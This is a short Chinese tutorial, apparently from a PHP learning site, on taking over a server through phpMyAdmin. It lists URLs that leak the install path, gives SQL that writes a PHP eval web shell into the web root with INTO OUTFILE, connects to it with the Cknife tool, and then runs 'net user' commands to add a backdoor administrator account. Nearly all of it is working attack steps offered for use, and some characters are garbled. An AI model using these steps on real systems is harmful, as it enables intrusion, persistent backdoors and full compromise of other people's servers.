下面由phpMyAdmin教程欄目給大家介紹利用phpmyadmin提權(quán)的方法,希望對需要的朋友有所幫助!
利用phpMyAdmin提權(quán)
爆路徑
- /phpmyadmin/libraries/lect_lang.lib.php
- /phpMyAdmin/index.php?lang[]=1
- /phpMyAdmin/phpinfo.php
- /load_file()
- /phpmyadmin/themes/darkblue_orange/layout.inc.php
- /phpmyadmin/libraries/select_lang.lib.php
- /phpmyadmin/libraries/lect_lang.lib.php
- /phpmyadmin/libraries/mcrypt.lib.php
得到物理路徑 C:wampwwwphpmyadminthemesdarkblue_orangelayout.inc.php
寫馬
立即學(xué)習(xí)“PHP免費學(xué)習(xí)筆記(深入)”;
Create?TABLE?a?(cmd?text?NOT?NULL); Insert?INTO?a?(cmd)?VALUES("<?php eval($_POST[Cknife]);?>"); select?cmd?from?a?into?outfile?"C:/wamp/www/phpmyadmin/d.php"; Drop?TABLE?IF?EXISTS?a;
獲得webshell
最后用Cknife連接,創(chuàng)建帳戶并添加到管理員用戶組
net user admin admin /add
net localgroup administrator admin /add
? 版權(quán)聲明
文章版權(quán)歸作者所有,未經(jīng)允許請勿轉(zhuǎn)載。
THE END